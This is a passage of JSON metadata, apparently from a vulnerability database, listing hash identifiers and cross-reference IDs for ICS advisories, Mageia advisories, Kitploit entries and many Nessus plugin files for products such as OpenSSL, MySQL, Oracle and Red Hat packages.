"85C244F40F078C64D61F63F2C6CB1A6851B539CC7B4530BE8884CFAD733EEA2C", "864B038FC0651FF53F9210F981E5FCF3587AFB330872619016CEF5D36569E098", "867D9ECEAB40B111EE25A99AD07419623F566D5212284F0A2C5C9E2D13C72DF2", "86D355F68F85D65B3FD45457F96CAF7864164018AA27439D7F53F3145DFF6AB4", "871A0564F000103EC07D1B9BC7B1DDE1427FEC3072CD636B9A5B83EE698D007E", "8731F85B75BA77CC3784CD784E98484D53CD189EA60F1F57A3A4EE351FF62B39", "87B26C2B63AF8A971A79B4CB2207EC51AF74A57FD839002466AFD594F7918F65", "880C8CCFEF3637D915CD2A945EAB6F29F1CFADA9041654A93101F51058EC852E", "88434B8A216FA4E9A7EDA68EE4211C8B663C7638A841826D77EA59C924786031", "88D4396F5AFD082566BDD5FF95312101BB6F94623E716D993F113380B02DC7D4", "88E396C29AABC664ACC3D5B0A3797EDDA0587772D5D9F452A2E356E7CC5BCD5D", "898EA6C5E20A9A6533D19F715FAA0AA31F646D5037D10EFCC09302D00AA729A8", "8A242C548ADF3E615FE6BA32C7E6F5B2DB8B1FA250ABF2329DC20A0FB32D3700", "8A273EC5B4E0D267BF1325C598530568659C444C274158543E88B980E7356184", "8A3C4FBF20635DD01A5B58269ABD76FF6451A13FCBB437C76C92D2484A5C9ECA", "8A7CBA2B71D5656EA1045254861664DE723E7E42111C9EB7B46C28B35C734DA5", "8AECCBE0CD244EF2C1818D4560A2112EBDDE17CF922BC7869D4367156735AD72", "8C13A93038AC136772B2598C633467116BF44538BBB507D836B65485D5AA47D7", "8DC736DE56FAB6587FE3F3374A135C46A0E7ED405164BCFB17F0C06DF2FA350A", "8EB2C9E7DB5013AD05B30490E2989C17EE64FBE9B0024B1E76805B1F1B95B816", "907EF939C00EE5A26CC88C7485D93D1BBE616B10931E772A7A5EC7FF5F930E02", "915F25F9D4BBEE1CAACAA6F5FD6ACC3E18033BE658B9A06B8B13ACD613C9B6FD", "91C10A77460E47F53661352C6380E6E959F0A94B552C3AE3314BBEC480C0AD09", "9214CE38F1DD3B6CCA3C0A0D3903A565EF865C916F6409B27D0CB5862470E985", "926064F28B2809B4877A8EA78CF19B1BD358570ECBEF53DC9ABC59798101D756", "92D11E24F34620A6FE2D4691E3050E4E91C0E161FD1B94C9116E157ADB7BACCC", "94533C1AEDE627C97E171FC1339661B263CF1EA6678274080F922CA0E372274C", "95C2166E43A3844158C127A63BEE990F476F0FFC80988625C50E6A864E13875C", "96172B0289A3157617DE620C9610D6DE694BCA12DD20D67BEB2C4BE5720F1E6F", "96E4D95F15652DD6FBDFAE305505663BA2700F82CB47BFE477129F5E3D0B258D", "97559256B8C83FB25D3AC653E1F3EBADCC04D4EF78DA4844805305C7544A6E9D", "9765CC2CD4E8CF43C86EE7859F7012EB2A38E6A4A80E55865CD6E4E883D3188A", "9872D764206750F6FD9C7F555D6B4C23926B755B4AE368CDD8485546CDEBC462", "98C2299E82C81E1CC3EFB8629E8262393014376C64F3F09018090397A1EA00AE", "99C4FE5226D6D4C3DFB065D997F2D2D168A50F2B090813B4AFFCC6BF971F9576", "9A19B1A61B0A4ADFDBA9E428552BF21656703586B14AC314FFC9B663C7D9BDEB", "9B62CAF06445F7A9F3CB323F735964F6F62E516F86B9B57472BC20182276D3FA", "9C1D1FE90E2F187821C270EFC3B5F3A57AF88428D8DB76F072CD050048739C9F", "9CC98367A213309185EDA7DC75FCDBBA5D5754142F33E0C8ED1B454D10CF416E", "9CCEB90B89301ED91DF7A501EF3103FD54D3AD611D342CF6E4B19E5105E84E35", "9D892AD714895E9B8DA3E59547784D03B32EADD3AC421AB0003E3191C1AE27AD", "9E3B1F6158EF5703EF54F7C3064A7EB99BF9523B8A6CCF05475346791179C879", "9F77A2B232638264007751AB7EA761B12687BBB622085917E5EB13783CA3A7EF", "A09274BA1A31537EA391724E8C52797113E094AE9E4EAA66FB5A50D995921587", "A185C8C5827E7A3A98D7506B04771B204C4CEB5CCCBECFC92AF7F9B22E4BD852", "A20DD20D95C60578C655644D1A8A4C9E587B5A7916261AE7A525E0C7B766C3AC", "A228DCB694CAC8220E8E2A0506C4BA75BC3542B483B96F88329D683D29298312", "A38279E551792BA29F1FA34034CD64E94266819C4862EDC7B206E7A748D269FD", "A4167E89DAF98623836F64826EDC7413C8B06B29A2E76A886419750438EAEA04", "A49F8E92510CDD96D8127764BC310529CF44A60596DB14352FF329575652A707", "A4F052050E4B3F587B7183D9FC910B303A3AE883F2DC83385E6EEA13376742FD", "A4FDFC527D8A765D6247DDB806EE98612DA0FE7BCB4E133A742D7FA9A06E39DC", "A71AFA4E20A54B2503C4A5DE40ED960DD9AFC34A35D94A0AF40474FE8CB4047A", "A75CF978305062012B0B6A4CC62CA7EB1F166F128DE714368CFD89193833D8DE", "A7B2D28F1E3492E411A234E996E861936D426FE8647F79D09D85E4989FFB0C19", "A940972EE8C6FDFEAA789156E684C0D5729686CEDFD51FCF6C875BE8FF25FBF6", "A94F39CD0E79745E3D615E6D91574F4476A22300F2013BDD63662E44D9BBDF03", "A965468AD7FD6E0FC84AAD8198928B8ABF25FC38D0638161A79D59279C9E678D", "A9B346426D7E045BF1AFCAA04855729B0A1174B2DAF2F97666408FD0C01D4B12", "A9C254F86614D2334E5A1624EEBD7497A5FA74BEC3159FA2530927B6C4A89585", "AAE50909D8058934D5CCB989B4CEA17B72CABD2BC4CF08576581EC909FE087A7", "AB9BF82645A26195B7E3A2A88C35E5D4BA1E45784589233A145CB109453CED5E", "ABF8825C48969D423E885B7CCB57BDB86E27F87DD082837A7884ABA77320FDB1", "ACB1BEB9F23F8E2951B24CB2F49DBE6E43DA9F3C9311028237E3DCFF917143EE", "ACF676405BBB5AE27485D9F48AD72AC6E8FE2D60EE0D4B0D45374459BCE07DA3", "B008610A37C6D22744FBFF511A07C43195D3F707766A5E89AB1E4CFCD0DE65C5", "B180B820F6F3D6EDAC7172E78991F02AFB09886A95FE4CB55E9318F8D116CF4C", "B22C029F5DE1AFDA33C7E45788FCA8B344362343E55B19D3803A4CCFD8492525", "B236D3400A0C6106EC62C77931DC3654EEBAB6EEA563B3344ECFF477FD634E81", "B2A25ABFDD14D83A9C74878F4C63CE1CD6838525C412393629ECDB21E73AF9AE", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "B36A668C28C4D760F6B565A18CA1708BA647B0486720FF7FEE833AC59F8D4800", "B37FB96EE4FA4B06328DA641D49120233F6F6FC031E87E5A21A71F34BB882B42", "B405B568B68AFEA07B8166064FAA890F3BF9F3CC511F9A01DE32970B8A066315", "B4BA991763253D738BCAA9AB61AE50E1AA4C20D6F3366D5551C3051C29FEADB2", "B5810DD31544DECD338CCD71F5C05C78B267068FE3FD01928B5545B05BEE5FA0", "B7FF1129A02D2738AED73A8C157F3D6D872B530527C875906B3678301D70ECBB", "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "B8E199CFC7A9C8DCF033928312B9AE0E344AB91916C93723350723B89FCB619A", "B99C5F7824BDBD569242794FC0AE3F64F2FD556C9A2F70A88BD9FAFA02B5562E", "B9A37A9137A6A153E70081729BB78D8014252B973451FD1F85F546C27C63DFCA", "BA641051633E4D947A94268037F8B8865B6EE865868B44CAAC2ACF192C454E89", "BBC001607D4FFC5BF566D998892962E49A145A0E15B990B9422BF06E1B00D42E", "BC7F561FAB80D5D0A48021AB45201595C02030C9CECEBEB548DFB50B6376384A", "BE523D88E9070A2DC41C20554C070BC6A203CA40E3C999CC7B9D52C82AF77DEF", "BE6E8380C13D1103EE23BA2477B40F90E44B32F9B46BF16533F8DB60DB918AA5", "BEB207CD99760307A802ABACD6003BA409940409CA99A3C7EBC99B31F98C7475", "BFFC97D9B867396253756A09ED28B13F581A2B14A0637B4684951D9BD6071488", "C0501217B805DB60B66BE6BAE92316B764C51679EEA5027CB07C6E657F8181A2", "C0F8A4FDB16B6060757282B298924E8005EF0D1B30BB3472B793362E6109A282", "C18E4772030D674D152D69B21575B31602E8081D2A7D63F34DF5712FA898D8EA", "C1DE62607E696F3135AA44A9ED964385998509307175EDF6F47BDAEC9E4F6C06", "C24D4FCC97FD95E90382A4216040099F16203ABF61AF30281EF1C2E136253A42", "C270008C47088F4AB45570D101436BB116E08F304CC36AF51E0823C68AFCAAE8", "C2E8B6DDE464206AEDDA1C71AA033CD48E5CBB40D6C71D0239B45AA056C35190", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "C52E4F43633A26DE3EC912F6665C082BAA08696723A69DA841FA0065F135AD79", "C596338966F1610A28DC01FBB21502CC71651B70DBC8B96D9603EBE432E4D5E6", "C651E37BF4B96F4EB07264F5CD8AF5358C07A1B2AF852ACFC9AC82E9E6722BEB", "C6D76168198B9EF24D77F1D04BA06E30D33B0C7D71C8457114E69E1A43BB68AD", "C7752951E8085C186BF5D89E852FCD41F36C211BD9364B8CA87F6E4FF8AFF924", "C9594147E388237928595F1CF759F8EC355015BE6AC29A030A2FA3207D9B6DE4", "C976F3FB2440651533AB7414A4F76FC3C66CAF49895BE704575E993E6B5F6D48", "C9B215C2E990733679984F0C6E86DB20EA1ED143683D79CFE88293360577ED49", "C9D56908C5941D51F8B700D0AEB133B65A72D4A5D3A7FAA2D989A477B71C954D", "CC714D6CB93526CA67C3B1AF953783F7648CF4A4936616886992C0290C5D5B18", "CD1AEA82D347BCF45C817F297F91F17B63798AE3055B653759D8342B9405F1E0", "CF5AE1AC4D7F12352FB77F91CC5048FC41163311A15377504B06C6A053ADC4D7", "CF8080897BA997E374072C563D7B6C6088F56DDA07F407BD98DF25411FE5E09C", "D0668B3886412A36787AE448B5228DC65FC97C2ED5317927E724EEFD286E1DBF", "D0917105241B3AF403EBCBDA7A2973304A787219E1BA33B2EC05560FF0A404EE", "D209AAB4C0E35A5C114E62A6D853762DB0AA9080D963F0EECA922C5D3ED15307", "D25F96BF8FFC89967E930C42C71D7208B95B880B834BD2A42F60151967CC51D1", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D41C12FBC700B1C1A9A83784082394BE3AA1A560141066160B2FD4DDF6C14DD4", "D5006110BB901C8B28332845E7232D26FD36B1609362E9BF8C8B8705EFBF33D5", "D5AA5A836C6CC887766560D5C0DEA7A00ECE08E7210420C4B9BBFF45EA1FF9F6", "D5D68C274689503F08DAB338007FECB9B03D6956ECF160CECB37263C1DB02BAC", "D70C0CFD2132EBB5AAF3CF53E301E73B5E5845FB7B0FC143B5DBE6CBAF3A884B", "D75C787D719F6B509B47AAA92C0EBBE969DDCD2CD7BAA1800C224FD759790609", "D82275F558C18EE0A66FA00314D493D498F1F12E5B589E97787630909B97E925", "D8BB0C04F4C87E1FB90E8BB3AE2E9667CC6668F2651561409DB510A8857B4220", "D97523F351811F117C3809A675614FA0AA4991E5EDCB8B79553402FA3DF8666B", "D9BE0065398666E1D67CCC53BE7B141B9D057940F7F6EFEC200D45AA41B346EE", "D9F3546932BD432766323A6E9A562D656E3EAC77AAB6EE3AAADFF6008E59BC30", "DA52C8AAC8E49FE83875D8FD83693222E58D6D178EBC1C00B564B8EB59727C9C", "DAB6CB181424781D3CAEADDD031227EAB5B67EECC36B24ACF558ADBC524F2D57", "DAB88099018B311F83DAFDB9431625A326A00FF72BE126856DCECA1262D7C308", "DB866DC8DC23646847AE5E9E25C02B2DF2A195A414B2734DCAA102E637957BAF", "DB8BD8B6F9DF029D39682639D78B9C6DADC00A8FA5AF3CB07A78FFE91CC29A0A", "DC3F9DC6E60E7791FEC4335A8C7FB9E85C847042EB357C7AEFE055E589B8FF69", "DC6CFA97AFC11ECA8AC903B07B25377D9849F6E270CE2A8494F78E7B651A0389", "DDAC6B14B8934B2E6C225A197BD36CA0AC38FD8684F572F5702537FFE8240DAB", "DDAE44367545E909F1C5E82BA6B48DEA1D51F717CEAE6CED7805AFEA883D85F1", "DDBD4BDAEE1412B8C8199BA8BCDE15F2A42D1C2982D2BFF3B062BFCD642CDD23", "DE755D1E61D0A41047FD8A35B464F4B957BE57D5BEBE81339F217B79B39CCD18", "DEAFA2DB54593AA80919E191E6F6089E8FC07DD6414224DF7420DF6F55DF4BC8", "E0C3E74CCF53D44D15D11C1DCF7920D7D255383A367FD84F2E4193D0754A67F1", "E0E9F996D64E7209F6A18673F090B066CB9EC2D93ADA025356B272CDA257ABBD", "E173DCA0E65F1BC893DFC386A3859828D95897C2E9C3CB8AB66C9F1FCD79D6C7", "E298AFAE6C10545EEFE2EDCB1E58ACEB81769C82FC173BB89206A046496B5501", "E2BB43D9DCFAAF1172FDDD2E46ECD410924036D49C8E4E9B1CB5312FDD5E81C8", "E31CD1CAA68AD6659A7C459337F50C896A6D30B1CC25BEF6FC361000F2ACE0D4", "E321CD2FAD2352A58756D698FB9F6AEEA2D5866CC41E10025794D036A188BF76", "E3BD856982B27C3FE93EC13A76D5806B5BB18B95DD328F70706B73BE68D790ED", "E515D9AE5ED3FEB7BDBAF35D90286D2E963A5E50F83A19555DC0BA545BE5A8E7", "E67441CCF9840E74E9AC61C45895075B9F65BB9C0A44EFD9BE418AA4A069F2CD", "E696B3CA5F178FD306B6388A56E29902BF7FB34F7E9DBB15469457C70EE0724C", "E6A3CDDEC0E8C0243CCF6E3AE7AAC01B3BFAB2E4DCD3167478C7DABA96539284", "E7A3E01F56125C0D2C4DCAD5C1C2ED2C377E247B54F164A5E471F3418EA2DA10", "E8A312ECF86D6A1C6D9722B8D51FDE987A400AF0C6568E0E843C6327878D3511", "E919E9A36C657D0228D3DA8A63FA716B3583174E73FC9F478D6A0F12BD9E2448", "EA4BC9A6E1BC28B39AE0C360DA599139777EC05EDFDC5120E91AC3051300D3E7", "EA88DB8E17F102D78A732DAA26FDE33416E9FF3CB6B71D047CC8325768802786", "EB488D986A623E81C07D5F38DFFA754649938084B72DDAA698DEA6B41BB73C49", "EC94857D7D563A0D20E8336122A527B358E52AC50ABAE059889E5A31BFEAB1C2", "EDB34CD93CDAF5921CF795AC72A6405C79962D06DE79535AF74133F2884DA4EB", "EEEA1AED0DDC584C51431A9908918AF5D5529838CADC30B95CF1D2E06A297A4E", "EF2B4F4110ACF96FDC34CF6D7B916C577277400859F5F464947088E0CE635995", "EF8F0A9CABE55A98975A5E586449578AFBE0581CC3BBC4848706891FDC02ED1D", "EFC96C84FC6627E09277E1FB61859CD2CA1859DFD91107C5D299A533D68503BF", "F0864C914EFB62F7C48822F52BDF423B57466738327736DD211AEFBE34B7C109", "F0E62F1700EDD02BA2F3839DDD88EA046C8C342A2FAE608A27D02F8C7F20EE45", "F1D303774ACA9A5AD0E510C3DF5F1397009E7D6FD2FDAFAC4642501D873381FE", "F22F8C611651BB5F2E58AC10F1F1DBEBF4869D3A824C40D9FE14FEE332E57295", "F2A538AF2ED1CAABCF5F0891DB02363ECADA659FE7F2989D3CCD7668E4585622", "F371D80CE1CB44AA4381E4D58E0C582D7E7120690249E2C9705A0905B942CC7C", "F459AB1C260CFFC2C7190B1E3819FC765E9C727A9B80E4712445C345AAC77B8F", "F4B54AA8642264D84C83C50AC6EDE073C6E0DF84951C7BE4C0C739B701EA41CE", "F4BDACE4C2BD969BE014F58FD96BAC012DCB9FD40640A048ED223245FEA36AB5", "F542A12C495D85C0CEB4091F4CA805B6D3F211CCA410B1C97964AA4680E716F4", "F590F9B8CCE606C3A8B1868747618F53738AF0A967C71C872865E6F97E3E2A42", "F5BAF336C0FFA1A9715652B899383A9C6D730D8ADE9E07CAD68C90971C7F8249", "F5D5AAF38F45575DCEBF7AD5E9B3D25AA8678ED2972A091BF0082B881BDC74A4", "F62105F81141CDEB3DFFD1F9477D41B2397FCACB19F1417F54D9BA82EB281648", "F7297DEE78789012F7802C00A7D437B06424929237D39542808A1D9905687922", "F779442F0B4B159B647211B27C52485C40EF8D77079FB564145C112408507200", "F7862E3AFF4165C1E96904B0CC478B568FD7C29638F30D7255C5D201546C0450", "F7A4C910A4DF2E02493D2FF5F34AA0A704BD3D1EDF63E2A05589FEA9676846E6", "F8A3D4A9CDB2E69EDABA736EFD7D24F77520D958AFA106D11E5EF76D4D31E151", "F90FD904FE2AD66DEF4FDDFD5D99DDE1F5E9A79893EE2F3ADB1619E2F648B6FC", "F936FE55F38C08867ADBDA8E6F3802EAC3CA57726D86C3FDB2C0BC8583619B6F", "F967014534DCCC8F81A119D3F6C4F892D3391900CC61B075AAC35C3073D741FA", "F96732014CC74E0CD212E2641AC086C0DBA609B9E2E61E3DC4259C4E401BE0FA", "F988C4692D2E552B4E225648097C2785A4DF9A107750563427C783A0CDEE0C5B", "F9A935F07F0C2592550406829A333AA17FFA9DE5B312BF55A008E03FEAC4C43E", "F9C3BC218F02B41A1EE998B0C9BACBCBA2A26044AA17D86E90806B1B4853903B", "FA37EFD6BCDF8414B1B01DD06C96E0D1E771E69F214D77948CB831C765C409D8", "FAA2B691DD1E76E786CADE53CD8A2391FDC6BE6F5B14624181F6008CE76C4E36", "FB725790185B6C1D6E94DE5593F9324A99EFC707F2DA722AC7D3588D3D90484E", "FC0AB5A04DEDCCA9B4FEE010F6A33E94AF0B79A3828E6659C5AB9764C36C13F8", "FC2A12A3D5CDFFAEF50A77215E69039CD0E678811823B3B21F6B390DAB68C2C0", "FC6CD52C9B1254CA4EDF111218F0B9EBBE253B30643BAEEC7B345AF2A6AD286F", "FFD41E5F30DBD4EDCF120209DC19F7C811FB744C733A2D1A203E4064577F26A0", "FFF1402575E7BE1F32E231DF470BEDA94544D3C346FFE024F98E6A628264A23E"]}, {"type": "ics", "idList": ["ICSA-22-349-21", "ICSMA-20-184-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "jvn", "idList": ["JVN:65044642"]}, {"type": "kaspersky", "idList": ["KLA11118"]}, {"type": "kitploit", "idList": ["KITPLOIT:2973941148692546578", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:8024306166267359540"]}, {"type": "mageia", "idList": ["MGASA-2015-0487", "MGASA-2016-0012", "MGASA-2016-0169", "MGASA-2016-0244", "MGASA-2016-0338", "MGASA-2016-0408", "MGASA-2017-0042", "MGASA-2017-0390", "MGASA-2017-0400", "MGASA-2017-0453", "MGASA-2018-0007", "MGASA-2018-0009"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785372", "MYHACK58:62201785395"]}, {"type": "nessus", "idList": ["700513.PRM", "700610.PASL", "700674.PASL", "700675.PASL", "700703.PASL", "9625.PRM", "9933.PRM", "9934.PRM", "AIX_OPENSSL_ADVISORY21.NASL", "AL2_ALAS-2018-1004.NASL", "ALA_ALAS-2015-618.NASL", "ALA_ALAS-2016-695.NASL", "ALA_ALAS-2016-755.NASL", "ALA_ALAS-2017-896.NASL", "ALA_ALAS-2017-913.NASL", "ALA_ALAS-2018-1016.NASL", "ALA_ALAS-2022-1562.NASL", "APACHE_2_4_28.NASL", "BLUECOAT_PROXY_SG_6_5_9_8.NASL", "CENTOS_RHSA-2015-2521.NASL", "CENTOS_RHSA-2015-2522.NASL", "CENTOS_RHSA-2015-2671.NASL", "CENTOS_RHSA-2016-0722.NASL", "CENTOS_RHSA-2016-0996.NASL", "CENTOS_RHSA-2016-1940.NASL", "CENTOS_RHSA-2017-2423.NASL", "CENTOS_RHSA-2017-2882.NASL", "CENTOS_RHSA-2017-2972.NASL", "CENTOS_RHSA-2017-3080.NASL", "CENTOS_RHSA-2017-3081.NASL", "CISCO_TELEPRESENCE_VCS_MULTIPLE_880.NASL", "CITRIX_XENSERVER_CTX212736.NASL", "DEBIAN_DLA-1102.NASL", "DEBIAN_DLA-361.NASL", "DEBIAN_DLA-456.NASL", "DEBIAN_DLA-637.NASL", "DEBIAN_DSA-3417.NASL", "DEBIAN_DSA-3566.NASL", "DEBIAN_DSA-3673.NASL", "DEBIAN_DSA-3980.NASL", "EULEROS_SA-2016-1047.NASL", "EULEROS_SA-2017-1213.NASL", "EULEROS_SA-2017-1214.NASL", "EULEROS_SA-2017-1252.NASL", "EULEROS_SA-2017-1253.NASL", "EULEROS_SA-2017-1261.NASL", "EULEROS_SA-2017-1262.NASL", "EULEROS_SA-2019-1389.NASL", "EULEROS_SA-2019-1419.NASL", "EULEROS_SA-2020-1420.NASL", "EULEROS_SA-2020-1637.NASL", "F5_BIGIP_SOL23512141.NASL", "F5_BIGIP_SOL44512851.NASL", "F5_BIGIP_SOL93600123.NASL", "FEDORA_2015-7D95466EDA.NASL", "FEDORA_2016-05C567DF1A.NASL", "FEDORA_2016-1411324654.NASL", "FEDORA_2016-1E39D934ED.NASL", "FEDORA_2016-21BD6A33AF.NASL", "FEDORA_2016-64E0743E16.NASL", "FEDORA_2016-97454404FE.NASL", "FEDORA_2016-A555159613.NASL", "FEDORA_2016-D717FDCF74.NASL", "FEDORA_2017-11EDC0D6C3.NASL", "FEDORA_2017-2CCFBD650A.NASL", "FEDORA_2017-3451DBEC48.NASL", "FEDORA_2017-511EBFA8A3.NASL", "FEDORA_2017-7E0FF7F73A.NASL", "FEDORA_2017-8348115ACD.NASL", "FEDORA_2017-A52F252521.NASL", "FEDORA_2017-B8358CDA24.NASL", "FEDORA_2017-E853B4144F.NASL", "FEDORA_2017-EBB76FC3C9.NASL", "FEDORA_2017-EF7C118DBC.NASL", "FEDORA_2017-F499EE7B12.NASL", "FEDORA_2017-FDD3A98E8F.NASL", "FREEBSD_PKG_01D729CA114311E6B55EB499BAEBFEAF.NASL", "FREEBSD_PKG_43EAA65680BC11E6BF52B499BAEBFEAF.NASL", "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "FREEBSD_PKG_C0DAE63448204505850DB1C975D0F67D.NASL", "FREEBSD_PKG_D455708AE3D311E69940B499BAEBFEAF.NASL", "GENTOO_GLSA-201612-16.NASL", "GENTOO_GLSA-201702-07.NASL", "GENTOO_GLSA-201710-32.NASL", "GENTOO_GLSA-201802-04.NASL", "HPSMH_7_6.NASL", "IBM_HTTP_SERVER_298437.NASL", "IBM_HTTP_SERVER_569301.NASL", "IBM_JAVA_2018_08_01.NASL", "JBOSS_JAVA_SERIALIZE.NASL", "JUNIPER_JSA10775.NASL", "JUNIPER_SPACE_JSA_10838.NASL", "LCE_4_8_1.NASL", "MACOSX_10_11_6.NASL", "MACOSX_SECUPD2017-005.NASL", "MACOS_10_13_2.NASL", "MYSQL_5_6_34.NASL", "MYSQL_5_6_34_RPM.NASL", "MYSQL_5_6_36.NASL", "MYSQL_5_6_36_RPM.NASL", "MYSQL_5_7_16.NASL", "MYSQL_5_7_16_RPM.NASL", "MYSQL_5_7_18.NASL", "MYSQL_5_7_18_RPM.NASL", "MYSQL_ENTERPRISE_MONITOR_3_1_5_7958.NASL", "MYSQL_ENTERPRISE_MONITOR_3_1_6_7959.NASL", "MYSQL_ENTERPRISE_MONITOR_3_2_2_1075.NASL", "MYSQL_ENTERPRISE_MONITOR_3_2_5_1141.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_1_1112.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "MYSQL_ENTERPRISE_MONITOR_3_4_8.NASL", "MYSQL_ENTERPRISE_MONITOR_4_0_2_5168.NASL", "NESSUS_TNS_2016_16.NASL", "NEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL", "NEWSTART_CGSL_NS-SA-2019-0117_TOMCAT6.NASL", "NEWSTART_CGSL_NS-SA-2019-0118_HTTPD.NASL", "OPENSSL_1_0_1T.NASL", "OPENSSL_1_0_1U.NASL", "OPENSSL_1_0_2H.NASL", "OPENSSL_1_0_2I.NASL", "OPENSSL_1_0_2K.NASL", "OPENSSL_1_1_0D.NASL", "OPENSSL_AES_NI_PADDING_ORACLE.NASL", "OPENSUSE-2015-705.NASL", "OPENSUSE-2016-1130.NASL", "OPENSUSE-2016-1134.NASL", "OPENSUSE-2016-1189.NASL", "OPENSUSE-2016-561.NASL", "OPENSUSE-2016-562.NASL", "OPENSUSE-2016-564.NASL", "OPENSUSE-2016-715.NASL", "OPENSUSE-2017-1083.NASL", "OPENSUSE-2017-1299.NASL", "OPENSUSE-2017-1381.NASL", "OPENSUSE-2017-256.NASL", "OPENSUSE-2017-284.NASL", "OPENSUSE-2017-442.NASL", "OPENSUSE-2017-866.NASL", "OPENSUSE-2018-168.NASL", "OPENSUSE-2018-389.NASL", "ORACLELINUX_ELSA-2015-2521.NASL", "ORACLELINUX_ELSA-2015-2522.NASL", "ORACLELINUX_ELSA-2015-2671.NASL", "ORACLELINUX_ELSA-2016-0722.NASL", "ORACLELINUX_ELSA-2016-0996.NASL", "ORACLELINUX_ELSA-2016-1940.NASL", "ORACLELINUX_ELSA-2017-2423.NASL", "ORACLELINUX_ELSA-2017-2882.NASL", "ORACLELINUX_ELSA-2017-2972.NASL", "ORACLELINUX_ELSA-2017-3080.NASL", "ORACLELINUX_ELSA-2017-3081.NASL", "ORACLELINUX_ELSA-2022-9419.NASL", "ORACLEVM_OVMSA-2016-0049.NASL", "ORACLEVM_OVMSA-2016-0135.NASL", "ORACLE_ACCESS_MANAGER_CPU_JAN_2018.NASL", "ORACLE_BI_PUBLISHER_APR_2018_CPU.NASL", "ORACLE_BI_PUBLISHER_APR_2020_CPU.NASL", "ORACLE_BI_PUBLISHER_JAN_2018_CPU.NASL", "ORACLE_BI_PUBLISHER_OCT_2018_CPU.NASL", "ORACLE_E-BUSINESS_CPU_JUL_2017.NASL", "ORACLE_E-BUSINESS_CPU_OCT_2016.NASL", "ORACLE_ENTERPRISE_MANAGER_APR_2017_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JAN_2017_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2016_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2017_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2018_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_APR_2019_CPU.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_JUL_2020_CPU_UI.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_JAN_2019.NASL", "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2018.NASL", "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_JAN_2018.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_OCT_2018.NASL", "ORACLE_JDEVELOPER_CPU_JAN_2018.NASL", "ORACLE_JDEVELOPER_CPU_JUL_2018.NASL", "ORACLE_OATS_CPU_APR_2016.NASL", "ORACLE_OATS_CPU_JUL_2018.NASL", "ORACLE_OATS_CPU_JUL_2020.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2020.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_APR_2019.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_APR_2019.NASL", "ORACLE_RDBMS_CPU_JAN_2018.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2017_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_JAN_2018_CPU.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_JUL_2016_CPU.NASL", "ORACLE_WEBCENTER_CONTENT_JAN_2018_CPU.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2018.NBIN", "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2018.NBIN", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2018.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2018.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2020.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2016.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "PFSENSE_SA-16_04.NASL", "PVS_5_2_0.NASL", "REDHAT-RHSA-2015-2500.NASL", "REDHAT-RHSA-2015-2521.NASL", "REDHAT-RHSA-2015-2522.NASL", "REDHAT-RHSA-2015-2535.NASL", "REDHAT-RHSA-2015-2536.NASL", "REDHAT-RHSA-2015-2538.NASL", "REDHAT-RHSA-2015-2539.NASL", "REDHAT-RHSA-2015-2540.NASL", "REDHAT-RHSA-2015-2542.NASL", "REDHAT-RHSA-2015-2671.NASL", "REDHAT-RHSA-2016-0722.NASL", "REDHAT-RHSA-2016-0996.NASL", "REDHAT-RHSA-2016-1773.NASL", "REDHAT-RHSA-2016-1940.NASL", "REDHAT-RHSA-2016-2073.NASL", "REDHAT-RHSA-2017-1801.NASL", "REDHAT-RHSA-2017-2423.NASL", "REDHAT-RHSA-2017-2635.NASL", "REDHAT-RHSA-2017-2636.NASL", "REDHAT-RHSA-2017-2637.NASL", "REDHAT-RHSA-2017-2638.NASL", "REDHAT-RHSA-2017-2808.NASL", "REDHAT-RHSA-2017-2809.NASL", "REDHAT-RHSA-2017-2811.NASL", "REDHAT-RHSA-2017-2882.NASL", "REDHAT-RHSA-2017-2972.NASL", "REDHAT-RHSA-2017-3080.NASL", "REDHAT-RHSA-2017-3081.NASL", "REDHAT-RHSA-2017-3113.NASL", "REDHAT-RHSA-2017-3193.NASL", "REDHAT-RHSA-2017-3194.NASL", "REDHAT-RHSA-2017-3195.NASL", "REDHAT-RHSA-2017-3240.NASL", "REDHAT-RHSA-2017-3399.NASL", "REDHAT-RHSA-2017-3476.NASL", 